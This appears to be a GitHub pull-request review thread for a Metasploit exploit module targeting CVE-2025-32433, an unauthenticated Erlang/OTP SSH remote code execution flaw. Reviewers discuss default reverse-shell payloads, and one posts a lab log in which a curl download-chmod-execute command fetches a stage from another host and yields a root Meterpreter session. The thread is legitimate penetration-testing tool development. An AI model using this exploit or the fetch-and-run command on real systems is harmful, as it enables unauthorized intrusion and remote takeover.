modules/exploits/linux/ssh/ssh_erlangotp_rce.rb

```diff
@@ -0,0 +1,198 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::CheckModule
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Erlang OTP Pre-Auth RCE',
+        'Description' => %q{
+          This module exploits CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH servers
+          that allows remote command execution. By sending crafted SSH packets, it executes a Metasploit
+          payload to establish a reverse shell on the target system.
+
+          The exploit leverages a flaw in the SSH protocol handling to execute commands via the Erlang `os:cmd`
+          function without requiring authentication.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Horizon3 Attack Team',
+          'Matt Keeley', # PoC
+          'Martin Kristiansen', # PoC
+          'mekhalleh (RAMELLA Sebastien)' # module author powered by EXA Reunion (https://www.exa.re/)
+        ],
+        'References' => [
+          ['CVE', '2025-32433'],
+          ['URL', 'https://x.com/Horizon3Attack/status/1912945580902334793'],
+          ['URL', 'https://platformsecurity.com/blog/CVE-2025-32433-poc'],
+          ['URL', 'https://github.com/ProDefense/CVE-2025-32433']
+        ],
+        'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD],
+        'DefaultOptions' => {
+          'CheckModule' => 'auxiliary/scanner/ssh/ssh_erlangotp'
+        },
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Platform' => 'linux',
+              'Arch' => ARCH_CMD,
+              'Type' => :linux_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/https/x64/meterpreter/reverse_tcp'
+              }
```

Comment:
The framework should default to using this payload, but it's good to inform users what payload was tested successfully with this target/ module, so leaving a comment is usually best: 
```suggestion
              # tested with cmd/linux/https/x64/meterpreter/reverse_tcp
```

Reply:
When the default payload is not specified in the module, by default I have a bad payload architecture:

![image](https://github.com/user-attachments/assets/7944207d-afba-4305-b2e7-281e18ea9ee1)

Do you really want to make this change?

Reply:
My apologies. After some further testing it seems like it would make sense to define the default payload here as an x64 fetch based payload, if you expect most Erlang/OTP SSH servers to be running on x64.

However aarch64 isn't necessarily a "bad" architecture in this scenario. I installed Erlang/OTP SSH on an ARM64 system and was able to get a session using the `cmd/linux/http/aarch64/meterpreter/reverse_tcp` payload. 

It might be worth adding a comment below the default payload stating that `cmd/linux/http/aarch64/meterpreter/reverse_tcp` has also been tested successfully with this module.

<details> 

<summary>ARM64 Erlang/OTP SSH testing</summary>

<p>


```
msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run
[*] Command to run on remote host: curl -sko ./kYhNgqtQaAD https://10.0.2.2:8080/7jSCp6j_wcrTWu7fK8d-ag;chmod +x ./kYhNgqtQaAD;./kYhNgqtQaAD&
[*] Fetch handler listening on 0.0.0.0:8080
[*] HTTPS server started
[*] Adding resource /7jSCp6j_wcrTWu7fK8d-ag
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 127.0.0.1:2222        - ssh://127.0.0.1:2222 - Starting exploit for CVE-2025-32433
[+] 127.0.0.1:2222        - ssh://127.0.0.1:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
[*] 127.0.0.1:2222        - ssh://127.0.0.1:2222 - Sending SSH_MSG_KEXINIT...
[*] 127.0.0.1:2222        - ssh://127.0.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN...
[*] 127.0.0.1:2222        - ssh://127.0.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
[*] 127.0.0.1:2222        - ssh://127.0.0.1:2222 - Received response: 000003d40814d78dac823ec56716ef3906c244d6b3160000011e637572766532353531392d7368613235362c637572766532353531392d736861323536406c69627373682e6f72672c63757276653434382d7368613531322c656364682d736861322d6e697374703532312c656364682d736861322d6e697374703338342c656364682d736861322d6e697374703235362c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d7368613235362c6469666669652d68656c6c6d616e2d67726f757031362d7368613531322c6469666669652d68656c6c6d616e2d67726f757031382d7368613531322c6469666669652d68656c6c6d616e2d67726f757031342d7368613235362c6578742d696e666f2d732c6b65782d7374726963742d732d763030406f70656e7373682e636f6d000000197273612d736861322d3531322c7273612d736861322d323536000000966165733235362d67636d406f70656e7373682e636f6d2c6165733235362d6374722c6165733139322d6374722c6165733132382d67636d406f70656e7373682e636f6d2c6165733132382d6374722c63686163686132302d706f6c7931333035406f70656e7373682e636f6d2c6165733235362d6362632c6165733139322d6362632c6165733132382d6362632c336465732d636263000000966165733235362d67636d406f70656e7373682e636f6d2c6165733235362d6374722c6165733139322d6374722c6165733132382d67636d406f70656e7373682e636f6d2c6165733132382d6374722c63686163686132302d706f6c7931333035406f70656e7373682e636f6d2c6165733235362d6362632c6165733139322d6362632c6165733132382d6362632c336465732d6362630000007b686d61632d736861322d3531322d65746d406f70656e7373682e636f6d2c686d61632d736861322d3235362d65746d406f70656e7373682e636f6d2c686d61632d736861322d3531322c686d61632d736861322d3235362c686d61632d736861312d65746d406f70656e7373682e636f6d2c686d61632d736861310000007b686d61632d736861322d3531322d65746d406f70656e7373682e636f6d2c686d61632d736861322d3235362d65746d406f70656e7373682e636f6d2c686d61632d736861322d3531322c686d61632d736861322d3235362c686d61632d736861312d65746d406f70656e7373682e636f6d2c686d61632d736861310000001a6e6f6e652c7a6c6962406f70656e7373682e636f6d2c7a6c69620000001a6e6f6e652c7a6c6962406f70656e7373682e636f6d2c7a6c696200000000000000000000000000731e96d85e5c2829
[+] 127.0.0.1:2222        - ssh://127.0.0.1:2222 - Payload sent successfully
[*] Client 127.0.0.1 requested /7jSCp6j_wcrTWu7fK8d-ag
[*] Sending payload to 127.0.0.1 (curl/7.88.1)
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (953388 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:61639) at 2025-04-25 09:48:48 -0700

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 12.10 (Linux 6.14.0-15-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter >
```


</p>


</details>

Reply:
Yes, that's exactly what I had in mind.